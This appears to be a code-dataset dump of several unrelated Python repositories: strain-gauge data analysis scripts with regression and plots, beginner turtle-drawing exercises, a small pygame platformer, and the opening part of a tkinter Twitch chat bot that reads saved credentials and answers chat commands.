\r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# Known data obtained from experiment 1\r\nE = 214.6e9\r\nA = 81e-6\r\nI_y = 29.9e-6 * 9e-4\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nnd_dif = [0] * 7\r\nsgs = np.arange(2, 13)\r\nfor expr in experiments:\r\n    df_exprmnts[expr] = df[df['experiment'] == expr]\r\n    nd_dif[expr] = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n    for i in range(4):\r\n        nd_dif[expr][i, :] = nd_dif[expr][i + 1, :] - nd_dif[expr][i, :]\r\n    nd_dif[expr] = np.delete(nd_dif[expr], -1, axis = 0)\r\n\r\n    print(nd_dif[expr])\r\n\r\nsg_shorts = [2, 3]\r\nsg_longs = [7, 8, 9]\r\nsg_short_places = [[0.02, 0], [0.005, 0]] \r\nsg_long_places = [[0,0.006],[0,0.026],[0, 0.046]] \r\n\r\ny_mids = []\r\nz_mids = []\r\nfor expr in [3, 4]:\r\n    for itime in range(4): \r\n        xs = []\r\n        ys = []\r\n        for i, sg in enumerate(sg_shorts):\r\n            xs += [[sg_short_places[i][0]]]\r\n            ys += [nd_dif[expr][itime, sg - 2] * 1e-6 * E]\r\n        clf = linear_model.LinearRegression()\r\n        clf.fit(xs, ys)\r\n        # print(xs)\r\n        print(ys)\r\n        # print(type(clf.intercept_), - clf.intercept_ / clf.coef_[0])\r\n        print(800 / A)\r\n        print( clf.intercept_)\r\n        y_mids += [(800 / A - clf.intercept_ )/ clf.coef_[0]]\r\n        x2s = [] \r\n        y2s = []\r\n        for i, sg in enumerate(sg_longs):\r\n            x2s += [[sg_long_places[i][1]]]\r\n            y2s += [nd_dif[expr][itime, sg - 2] * 1e-6 * E]\r\n        clf2 = linear_model.LinearRegression() \r\n        clf2.fit(x2s, y2s)\r\n        z_mids += [(800 / A - clf2.intercept_ )/ clf2.coef_[0]]\r\n\r\n\r\nprint(y_mids)\r\nprint(z_mids)\r\n\r\nprint(pd.Series(y_mids).describe())\r\nprint(pd.Series(z_mids).describe())\r\n\r\n# visualization\r\nplt.subplot(1, 2, 1)\r\nx = np.arange(0, 40, 1)\r\nk = clf.coef_ \r\nb = clf.intercept_\r\ny = x * k * 1e-3 + b - 800 / A\r\nplt.plot(x, y)\r\nplt.plot((800 / A - b )/ k / 1e-3, 0, 'r*')\r\nprint((800 / A - b )/ k / 1e-3)\r\n\r\nplt.grid()\r\n#\r\nplt.subplot(1, 2, 2)\r\nx = np.arange(0, 50, 1)\r\nk = clf2.coef_ \r\nb = clf2.intercept_\r\ny = x * k * 1e-3 + b - 800 / A\r\nplt.plot(x, y)\r\nplt.plot((800 / A - b )/ k / 1e-3, 0, 'r*')\r\nplt.xticks(np.arange(0, 51, 10))\r\nplt.grid()\r\n\r\nplt.show()\r\nprint((800 / A - b )/ k / 1e-3)\r\n" }, { 
"alpha_fraction": 0.5537848472595215, "alphanum_fraction": 0.5826693177223206, "avg_line_length": 21.952381134033203, "blob_id": "ddf792cd1187423e3c4c006c1635a58afc222005", "content_id": "0facc7f212266fd4470961aa2bb7e7fe8edbe55a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 60, "num_lines": 42, "path": "/q1method1.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\nsg_xs = [2, 3, 5, 7, 8, 9, 11]\r\ncols = ['sg' + str(i) for i in sg_xs]\r\nprint(cols)\r\n\r\ndf = pd.read_csv('input/data123.csv')\r\n# print(df)\r\n# print(df[df['experiment'] == 1])\r\n# print(type(df['sg2']))\r\n\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nprint(df_exprmnts)\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n # print(df_exprmnts[i])\r\n\r\nlst = df_exprmnts[5]['sg2'].tolist()\r\n\r\nprint(lst)\r\n\r\ndef print_a_sg(epsilon_sg):\r\n forces = [800 * i for i in np.arange(1, 7)]\r\n\r\ntotal_dif = []\r\nfor expr in [5, 6]:\r\n for sg in sg_xs:\r\n col_name = 'sg' + str(sg)\r\n epsilon_sg = df_exprmnts[expr][col_name].tolist()\r\n for i in range(4):\r\n total_dif += [epsilon_sg[i + 1] - epsilon_sg[i]]\r\n\r\nplt.bar(np.arange(0, len(total_dif)), total_dif)\r\n# plt.hist(total_dif)\r\n# plt.show()\r\ntotal_dif = pd.Series(total_dif)\r\n\r\nprint(total_dif)\r\nprint(total_dif.describe())" }, { "alpha_fraction": 0.5091220140457153, "alphanum_fraction": 0.5889395475387573, "avg_line_length": 25.015384674072266, "blob_id": "4e3c496547ad218fe71b971728b8552ccdad0970", "content_id": "d3f407368a02be544712b48f0ba4cf3d76608cef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1886, "license_type": "no_license", "max_line_length": 120, "num_lines": 65, "path": "/q1method2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom pylab import *\r\n\r\nsg_xs = [5, 11]\r\ncols = ['sg' + str(i) for i in sg_xs]\r\nprint(cols)\r\ndf = pd.read_csv('input/data123.csv')\r\n\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\nlst1 = df_exprmnts[5]['sg5'].tolist()\r\nlst2 = df_exprmnts[6]['sg5'].tolist()\r\n\r\n#解决中文显示问题\r\nplt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体\r\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\n\r\ndef vis(lst1, lst2, ax):\r\n \r\n\r\n dif1 = np.array([0] * 4)\r\n dif2 = np.array([0] * 4)\r\n for i in range(4):\r\n dif1[i] = lst1[i + 1] - lst1[i]\r\n dif2[i] = lst2[i + 1] - lst2[i]\r\n ax2 = ax.twinx()\r\n bar_width = 0.4 * 800\r\n ax2.bar(np.arange(1200, 4001, 800) - bar_width / 2, dif1,width = bar_width, color = 'xkcd:sky blue', alpha = 0.65)\r\n ax2.bar(np.arange(1200, 4001, 800) + bar_width / 2, dif2,width = bar_width, color = 'y', alpha = 0.65)\r\n ax2.set_ylim(0, 100)\r\n ax2.legend(['试验一','试验二'])\r\n ax2.set_ylabel(r'每次加载增加的应变值$\\varepsilon$')\r\n\r\n ax.plot(np.arange(800, 4001, 800), lst1)\r\n ax.plot(np.arange(800, 4001, 800), lst2)\r\n ax.legend(['试验一','试验二'])\r\n ax.set_ylabel(r'应变值$\\varepsilon$')\r\n ax.set_xlabel(r'加载拉力($N$)')\r\n ax.set_xticks(np.arange(800, 4001, 800))\r\n\r\n print(pd.Series(list(dif1) + 
list(dif2)).describe())\r\n\r\n \r\n\r\n\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(121)\r\nvis(lst1, lst2, ax)\r\nax.set_title('应变片5')\r\n\r\nax3 = fig.add_subplot(122)\r\nlst1 = df_exprmnts[5]['sg11'].tolist()\r\nprint(lst1)\r\nlst2 = df_exprmnts[6]['sg11'].tolist()\r\nvis(lst1, lst2, ax3)\r\nax3.set_title('应变片11')\r\nsubplots_adjust(wspace = .5)\r\nplt.show()" }, { "alpha_fraction": 0.5085945129394531, "alphanum_fraction": 0.5429726839065552, "avg_line_length": 25.52777862548828, "blob_id": "78c9267227df10e9f95969e6e8eb6174558523fc", "content_id": "be243ec8b9bc47cf5b81ad53d701a10a3e335e87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 989, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/q1mu.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nnd_dif = [0] * 7\r\nsgs = np.arange(2, 13)\r\nfor expr in experiments:\r\n df_exprmnts[expr] = df[df['experiment'] == expr]\r\n nd_dif[expr] = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n for i in range(4):\r\n nd_dif[expr][i, :] = nd_dif[expr][i + 1, :] - nd_dif[expr][i, :]\r\n nd_dif[expr] = np.delete(nd_dif[expr], -1, axis = 0)\r\n\r\n print(nd_dif[expr])\r\n\r\n\r\nsg_xs = [2, 5, 8, 11]\r\nsg_ys = [4, 6, 10, 12]\r\n\r\nmus = []\r\nfor expr in [5, 6]:\r\n for i in range(4):\r\n sgx_name = (sg_xs[i] - 2)\r\n sgy_name = (sg_ys[i] - 2)\r\n for itime in range(4):\r\n mus += [ - nd_dif[expr][itime, sgy_name] / nd_dif[expr][itime, sgx_name]]\r\n # print(mus)\r\n\r\nprint(mus)\r\nplt.bar(np.arange(0, len(mus)), mus)\r\nplt.show()\r\nprint(pd.Series(mus).describe())" } ]
6
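Every q1-q3 script above reduces to the same step: fit a least-squares line through (coordinate, stress) pairs and read the physics off `coef_` and `intercept_`. The pattern in isolation, with made-up numbers standing in for the strain-gauge readings:

```python
import numpy as np
from sklearn import linear_model

z = np.array([[0.005], [0.015], [0.025], [0.045]])  # illustrative z* coordinates (m)
sigma = np.array([0.7e6, 1.9e6, 3.2e6, 5.4e6])      # illustrative bending stresses (Pa)

clf = linear_model.LinearRegression().fit(z, sigma)
print(clf.coef_[0], clf.intercept_)  # slope and offset, the M/I_y-style quantities read off above
print(clf.score(z, sigma))           # R^2, as scanned over angles in q3method1.py
```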
crookescout/unit3
https://github.com/crookescout/unit3
6ecacf70ba540dcdd923036e88accc1b79738f9a
8e549a6b3593137f0aec6b9e62f597f2fa726fdf
2c6ea39881febfab6c04e6a94b878193f6620bac
refs/heads/master
2020-08-02T13:30:19.088397
2019-10-25T13:17:45
2019-10-25T13:17:45
211,369,863
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5548561215400696, "alphanum_fraction": 0.6393885016441345, "avg_line_length": 12.899999618530273, "blob_id": "5a2f0acf133114a8be4c6565072d9ae4e0596353", "content_id": "04a9974b2efc1888f902994f25c30c97a7c04539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1112, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/letters.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 9/26/19, this program uses letters to spell MISSISSIPPI\n\nimport turtle\nturtle.speed(0)\nturtle.pencolor(\"purple\")\nturtle.pensize(2)\n\nturtle.penup()\nturtle.back(300)\nturtle.pendown()\n\n\ndef make_m():\n turtle.left(90)\n turtle.fd(100)\n turtle.right(120)\n turtle.fd(50)\n turtle.left(60)\n turtle.fd(50)\n turtle.right(120)\n turtle.fd(100)\n\n\nmake_m()\n\nturtle.penup()\nturtle.left(90)\nturtle.forward(10)\nturtle.pendown()\n\n\ndef make_i():\n turtle.fd(28)\n turtle.left(180)\n turtle.fd(14)\n turtle.right(90)\n turtle.fd(100)\n turtle.left(90)\n turtle.fd(14)\n turtle.left(180)\n turtle.fd(28)\n\n\nmake_i()\n\nturtle.penup()\nturtle.forward(80)\nturtle.pendown()\n\n\n\ndef make_s():\n turtle.left(140)\n turtle.fd(30)\n turtle.left(80)\n turtle.fd(30)\n turtle.left(50)\n turtle.fd(40)\n turtle.left(70)\n turtle.fd(45)\n turtle.right(70)\n turtle.fd(40)\n turtle.right(65)\n turtle.fd(30)\n turtle.right(55)\n turtle.fd(30)\n\n\nmake_s()\n\nturtle.penup()\nturtle.right(120)\nturtle.fd(200)\nturtle.right(50)\nturtle.pendown()\n\nmake_s()\n\n\nturtle.exitonclick()\n" }, { "alpha_fraction": 0.6368653178215027, "alphanum_fraction": 0.6445916295051575, "avg_line_length": 23.5, "blob_id": "ed17b68f6a1bfa77ff3932519445cc258ebe1204", "content_id": "14b219d7fb76cac2da6475350869072682b5f64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1812, "license_type": "no_license", "max_line_length": 114, "num_lines": 74, "path": "/assignment_option3.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 10/1/19, This program draws a hexagon flower\n\nimport turtle\n\n\ndef get_side_length():\n \"\"\"\n this function gets the length of a side of the hexagon from the user\n :return: integer value of the side length\n \"\"\"\n return int(input(\"What is the length of a side of the hexagon?\"))\n\n\ndef get_center_color():\n \"\"\"\n this function gets the color of the center of the flower from the user\n :return: string value of the color of the center of the flower\n \"\"\"\n return input(\"What is the color of the center of the flower?\")\n\n\ndef get_petal_color():\n \"\"\"\n this function gets the color of the flower petals from the user\n :return: string value of the color of the flower petals\n \"\"\"\n return input(\"What is the color of the flower petal?\")\n\n\ndef make_hexagon(color, length):\n \"\"\"\n this function draws the center of the flower using the given color and length\n :param color:\n :param length:\n :return: none\n \"\"\"\n turtle.color(color)\n turtle.begin_fill()\n for x in range(6):\n turtle.forward(length)\n turtle.right(60)\n turtle.end_fill()\n\n\ndef make_petals(color, length):\n \"\"\"\n this function draws the petal of the flower using the given color and length. 
It is needed because, otherwise,\n it would draw over the same hexagon over and over\n :param color:\n :param length:\n :return: none\n \"\"\"\n turtle.color(color)\n turtle.begin_fill()\n for x in range(6):\n turtle.fd(length)\n turtle.left(60)\n turtle.end_fill()\n\n\ndef main():\n length = get_side_length()\n center = get_center_color()\n petal = get_petal_color()\n make_hexagon(center, length)\n for x in range(6):\n turtle.fd(length)\n turtle.right(60)\n make_petals(petal, length)\n\n\nmain()\n\nturtle.exitonclick()" }, { "alpha_fraction": 0.5458996295928955, "alphanum_fraction": 0.5605875253677368, "avg_line_length": 13.333333015441895, "blob_id": "02b8c10965c30578d71cf74c48c3e685bad09699", "content_id": "cd47a8743230b80e25d32705a83243e1ebc09afc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 69, "num_lines": 57, "path": "/daily_exercises.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# By Scout Crooke, 9/25/29, this program works on daily function exercises\n\n\ndef make_hexagon_top():\n print(\" ________\")\n print(\" / \\\\\")\n print(\"/ \\\\\")\n\n\ndef make_haxagon_bottom():\n print(\"\\\\ /\")\n print(\" \\\\________/\") \\\n\n\n\ndef make_punctuation():\n print(\" _\\\"_\\'_\\\"_\\'_\\\"_\")\n\n\nmake_hexagon_top()\nmake_haxagon_bottom()\nmake_punctuation()\nmake_hexagon_top()\nmake_haxagon_bottom()\nmake_punctuation()\nmake_haxagon_bottom()\nmake_hexagon_top()\nmake_punctuation()\nmake_haxagon_bottom()\n\n\ndef happy_bd_ty():\n print(\"Happy Birthday to you\")\n\n\ndef happy_bd_db(name):\n print(\"Happy Birthday dear\", name)\n\n\nfor x in range(2):\n happy_bd_ty()\n\nhappy_bd_db(\"Brian\")\nhappy_bd_ty()\n\n\ndef plus(x, y):\n return x + y\n\n\ndef main():\n plus(8, 9)\n plus(6, 5)\n plus(2, 4)\n\n\nmain()\n" }, { "alpha_fraction": 0.6010362505912781, "alphanum_fraction": 0.6113989353179932, "avg_line_length": 31.16666603088379, "blob_id": "cb4212894c4f028722c1649f6d92f0fc73fbbb1e", "content_id": "795efb9156e739cd2e362ead42f46148c0bfb45e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 120, "num_lines": 18, "path": "/triangle.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 9/26/19, this program calculates the area of a triangle given the length of its three sides\n\nimport math\n\n\ndef area_of_triangle(a, b, c):\n s = (a + b + c) / 2\n area = math.sqrt(s * (s - a) * (s - b) * (s - c))\n return area\n\n\nside_a = float(input(\"What is the length of side a?\"))\nside_b = float(input(\"What is the length of side b?\"))\nside_c = float(input(\"What is the length of side c?\"))\n\na = area_of_triangle(side_a, side_b, side_c)\n\nprint(\"The area of a triangle with side lengths\", str(side_a) + \",\", str(side_b) + \",\", \"and\", str(side_c), \"equals\", a)\n" } ]
4
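triangle.py above is Heron's formula: with semi-perimeter s = (a + b + c) / 2, the area is sqrt(s(s-a)(s-b)(s-c)). A quick sanity check on the classic 3-4-5 right triangle, whose area must also equal (3 * 4) / 2:

```python
import math

a, b, c = 3.0, 4.0, 5.0
s = (a + b + c) / 2                                # s = 6.0
area = math.sqrt(s * (s - a) * (s - b) * (s - c))  # sqrt(6 * 3 * 2 * 1)
print(area)                                        # 6.0, matching the right-triangle formula
```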
Hiauk/Metroidvania
https://github.com/Hiauk/Metroidvania
b01c4c79194ef9d283e3251433f51f4f8a424d2a
65c9bf47de7d12be4e8d565dde6fdb8850feddc7
2dfdd2443eadc8fb64020c1d73a2af8a9b3abb5d
refs/heads/master
2020-02-07T19:19:38.465058
2017-08-23T18:37:05
2017-08-23T18:37:05
99,319,831
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5054048895835876, "alphanum_fraction": 0.5164043307304382, "avg_line_length": 33.464054107666016, "blob_id": "16371a1d170c36a41445dfb567457646e309f0b6", "content_id": "3adca07695f34b579e616abcc135f4b2842cdd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5273, "license_type": "no_license", "max_line_length": 128, "num_lines": 153, "path": "/sprites.py", "repo_name": "Hiauk/Metroidvania", "src_encoding": "UTF-8", "text": "import pygame as pg\nfrom settings import *\nvec = pg.math.Vector2\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((TILESIZE, TILESIZE*2))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.vel = vec(0, 0)\n self.pos = vec(x, y) * TILESIZE\n self.standing = False\n self.jumping = False\n self.jump_offset = 0\n self.jump_height = 40\n self.crouching = False\n self.direction = 1\n\n def get_keys(self):\n self.vel = vec(0, 0)\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT] or keys[pg.K_a]:\n self.vel.x = -PLAYER_SPEED\n self.direction = 3\n if keys[pg.K_RIGHT] or keys[pg.K_d]:\n self.vel.x = PLAYER_SPEED\n self.direction = 1\n if keys[pg.K_UP] or keys[pg.K_w]:\n self.direction = 4\n if keys[pg.K_DOWN] or keys[pg.K_s]:\n self.direction = 2\n if self.vel.x != 0 and self.vel.y != 0:\n self.vel *= 0.7071\n\n def collide_with_walls(self, dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vel.x > 0:\n self.pos.x = hits[0].rect.left - self.rect.width\n if self.vel.x < 0:\n self.pos.x = hits[0].rect.right\n self.vel.x = 0\n self.rect.x = self.pos.x\n if dir == 'y':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vel.y > 0:\n self.pos.y = hits[0].rect.top - self.rect.height\n self.standing = True\n if self.vel.y < 0:\n self.pos.y = hits[0].rect.bottom\n self.jumping = False\n self.jump_offset = 0\n self.vel.y = 0\n self.rect.y = self.pos.y\n else:\n self.standing = False\n\n def jump(self):\n if self.standing == True:\n self.standing = False\n self.jumping = True\n\n def shoot(self):\n self.bullet = Bullet(self.game, self.pos.x + (self.rect.width / 2), self.pos.y + (self.rect.height / 2), self.direction)\n\n def crouch(self):\n if self.crouching == False:\n self.image = pg.Surface((TILESIZE, TILESIZE))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.pos.y += TILESIZE\n self.crouching = True\n else:\n self.image = pg.Surface((TILESIZE, TILESIZE*2))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.pos.y -= TILESIZE\n self.crouching = False\n\n def update(self):\n self.get_keys()\n if self.jumping == True:\n if self.jump_offset < self.jump_height:\n self.vel.y -= 300 - (self.jump_offset*2)\n self.jump_offset += 1\n else:\n self.jumping = False\n self.jump_offset = 0\n else:\n self.vel.y += 500\n self.pos += self.vel * self.game.dt\n self.rect.x = self.pos.x\n self.collide_with_walls('x')\n self.rect.y = self.pos.y\n self.collide_with_walls('y')\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y, walltype):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.type = walltype\n imagefile = ''\n #self.image = pg.image.load('images/block.png')\n if self.type == '1':\n imagefile = 'images/spiral.png'\n elif self.type == '2':\n imagefile = 
'images/solid.png'\n elif self.type == '3':\n imagefile = 'images/stripes1.png'\n else:\n imagefile = 'images/wall1.png'\n self.image = pg.image.load(imagefile)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, game, x, y, direction):\n self.groups = game.all_sprites, game.bullets\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((8,8))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n self.speed = 400\n self.direction = direction\n\n def update(self):\n if self.direction == 1:\n self.rect.x += self.speed * self.game.dt\n elif self.direction == 2:\n self.rect.y += self.speed * self.game.dt\n elif self.direction == 3:\n self.rect.x -= self.speed * self.game.dt\n elif self.direction == 4:\n self.rect.y -= self.speed * self.game.dt\n if pg.sprite.spritecollide(self, self.game.walls, False):\n self.kill()\n\n def collision_check(self):\n return pg.sprite.spritecollide(self, self.game.walls, False)\n" }, { "alpha_fraction": 0.47772276401519775, "alphanum_fraction": 0.6435643434524536, "avg_line_length": 20.210525512695312, "blob_id": "9db0839fc4c370c7c64a6c50abbff4b6d2d03faf", "content_id": "614bc973e1704b536d053025467c48efbe332372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 45, "num_lines": 19, "path": "/settings.py", "repo_name": "Hiauk/Metroidvania", "src_encoding": "UTF-8", "text": "# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (31, 31, 31)\nDARKGREEN = (77, 83, 61)\nLIGHTGREEN = (139, 148, 111)\n\n# game settings\nWIDTH = 480 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 360 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"Tilemap Demo\"\nBGCOLOR = DARKGREEN\n\nTILESIZE = 32\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n#player settings\nPLAYER_SPEED = 300\n\n" } ]
2
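sprites.py above multiplies every velocity by `self.game.dt`, but the main loop that produces `dt` is not part of this record. A runnable sketch of the usual pygame pattern for frame-rate-independent movement (the loop body and FPS value here are illustrative, matching settings.py):

```python
import pygame as pg

FPS = 60                            # same value as settings.py
pg.init()
clock = pg.time.Clock()
for _ in range(3):                  # stand-in for the real game loop
    dt = clock.tick(FPS) / 1000.0   # Clock.tick returns elapsed milliseconds
    print(dt)                       # sprites then move by vel * dt, in seconds
```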
DominicMuckzZ/Twitch-Bot-Interface
https://github.com/DominicMuckzZ/Twitch-Bot-Interface
59554c8c0961b1a04ad21dba7571783b6e0cc6d4
59685a320a941d93118bc6ece09328aab844e0f6
d42b64266edfe1d34063f063dc23f497691a483c
refs/heads/main
2023-04-24T23:46:56.281863
2021-05-06T20:54:41
2021-05-06T20:54:41
364,979,024
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.565960168838501, "alphanum_fraction": 0.5783265829086304, "avg_line_length": 37.022315979003906, "blob_id": "884d8fcb6b711e95d4120922a975d5e57519422b", "content_id": "e53884df085c2bcecbcdd3f93eb9f0cb9350f01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27979, "license_type": "no_license", "max_line_length": 137, "num_lines": 717, "path": "/main.py", "repo_name": "DominicMuckzZ/Twitch-Bot-Interface", "src_encoding": "UTF-8", "text": "import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nimport tkinter.messagebox as messagebox\r\nimport tkinter.simpledialog as simpledialog\r\n\r\nfrom threading import Thread\r\nimport pickle\r\nimport datetime\r\nimport socket\r\nimport json\r\nimport requests\r\nimport random\r\nimport re\r\n\r\nclass command():\r\n def __init__(self,name,description,output,active,lastUsed,userLevel,cooldown=5):\r\n self.name = name\r\n self.description = description\r\n self.output = output\r\n self.active = active\r\n self.lastCalled = lastUsed\r\n self.userLevel = userLevel\r\n self.cooldown = cooldown\r\n\r\n def isCooleddown(self):\r\n if self.lastCalled == None or self.lastCalled <= datetime.datetime.now() - datetime.timedelta(minutes=int(self.cooldown)):\r\n return True\r\n return False\r\n \r\n def getValues(self):\r\n active = u\"\\u274C\"\r\n if self.active:\r\n active = u\"\\u2713\"\r\n return (active,self.name,self.description,self.output,self.userLevel)\r\n\r\n def getOutput(self):\r\n return self.output\r\n\r\n def isActive(self):\r\n return self.active\r\n \r\n def invertActive(self):\r\n self.active = not(self.active)\r\n\r\n def getUserLevel(self):\r\n return [\"viewer\",\"moderator\",\"broadcaster\"].index(self.userLevel)\r\n\r\nclass message():\r\n def __init__(self,message):\r\n self.active = True\r\n self.message = message\r\n\r\n def getValues(self,index):\r\n active = u\"\\u274C\"\r\n if self.active:\r\n active = u\"\\u2713\"\r\n return (index,active,self.message)\r\n\r\n def getOutput(self):\r\n return self.message\r\n\r\n def isActive(self):\r\n return self.active\r\n \r\n def invertActive(self):\r\n self.active = not(self.active)\r\n\r\nHOST = \"irc.twitch.tv\"\r\nPORT = 6667\r\ntry:\r\n botInfo = pickle.load(open(\"botCredentials.p\",\"rb\"))\r\n CHAN = botInfo[\"CHAN\"]\r\n NICK = botInfo[\"NICK\"]\r\n PASS = botInfo[\"PASS\"]\r\n RMIT = botInfo[\"RMIT\"]\r\n AMES = botInfo[\"AMES\"]\r\n EMES = botInfo[\"EMES\"]\r\nexcept:\r\n CHAN = \"#\"\r\n NICK = \"\"\r\n PASS = \"\"\r\n RMIT = True\r\n AMES = False\r\n EMES = 50\r\n\r\ntry:\r\n callableCommands = pickle.load(open(\"CommandsList.p\",\"rb\"))\r\nexcept Exception as e:\r\n print(e)\r\n callableCommands = {}\r\ntry:\r\n randomMessages = pickle.load(open(\"randomMessages.p\",\"rb\"))\r\nexcept Exception as e:\r\n print(e)\r\n randomMessages = []\r\n\r\ncross = u\"\\u274C\"\r\ntick = u\"\\u2713\"\r\nmoderators = []\r\n \r\nclass Bot():\r\n def __init__(self):\r\n self.connected = False\r\n self.connection = None\r\n self.thread = None\r\n self.botApplication = None\r\n self.viewerList = []\r\n self.rmIndex = 0\r\n\r\n def startConnection(self,botApplication):\r\n self.connected = True\r\n self.botApplication = botApplication\r\n self.thread = Thread(target=self.connectToChannel)\r\n self.thread.daemon = True\r\n self.thread.start()\r\n\r\n def stopConnection(self):\r\n self.connection = False\r\n try:\r\n self.thread.stop()\r\n except:\r\n pass\r\n\r\n def sendRandomMessage(self):\r\n randomMessageList = 
self.getActiveRM()\r\n        if len(randomMessageList) > 0:\r\n            if self.botApplication.iterateRM:\r\n                outgoingMessage = randomMessageList[self.rmIndex]\r\n                self.rmIndex += 1\r\n                if self.rmIndex >= len(randomMessageList):\r\n                    self.rmIndex = 0\r\n            else:\r\n                outgoingMessage = random.choice(randomMessageList)\r\n            self.sendMessage(self.CHAN,outgoingMessage.getOutput())\r\n\r\n    def getModerators(self):\r\n        link = f\"http://tmi.twitch.tv/group/user/{self.CHAN.replace('#','')}/chatters\"\r\n        r = requests.get(link)\r\n        modsJson = r.json()\r\n        \r\n        return modsJson[\"chatters\"][\"moderators\"]\r\n    \r\n    def connectToChannel(self):\r\n        self.CHAN = self.botApplication.channelName.get()\r\n        self.NICK = self.botApplication.nickEntry.get()\r\n        self.PASS = self.botApplication.oauthEntry.get()\r\n        self.connection = socket.socket()\r\n        self.connection.connect((HOST,PORT))\r\n\r\n        self.sendPass()\r\n        self.sendNick()\r\n        self.joinChannel()\r\n\r\n        data = \"\"\r\n        messageCount = 0\r\n        try:\r\n            while self.connected:\r\n                data = data+self.connection.recv(1024).decode('UTF-8')\r\n\r\n                data_split = re.split(r\"[~\\r\\n]+\", data)\r\n                data = data_split.pop()\r\n                \r\n                for line in data_split:\r\n                    line = str.rstrip(line)\r\n                    line = str.split(line)\r\n\r\n                    if line == [':tmi.twitch.tv', 'NOTICE', '*', ':Login', 'authentication', 'failed']:\r\n                        raise ConnectionAbortedError\r\n\r\n                    if len(line) >= 2:\r\n                        if line[0] == 'PING':\r\n                            self.sendPong(line[1])\r\n\r\n                        if line[1] == 'PRIVMSG':\r\n                            sender = self.getSender(line[0])\r\n\r\n                            message = self.getMessage(line)\r\n\r\n                            if sender not in self.viewerList:\r\n                                self.viewerList.append(sender)\r\n                                self.botApplication.addViewer(sender)\r\n\r\n                            if self.parseMessages(sender,message):\r\n                                messageSplit = message.split(\" \")\r\n                                outgoingMessage = callableCommands[messageSplit[0]].getOutput()\r\n                                self.sendMessage(self.CHAN,self.formatMessage(outgoingMessage,message,sender))\r\n                            else:\r\n                                if self.botApplication.allowMessages:\r\n                                    messageCount += 1\r\n                                    if messageCount >= 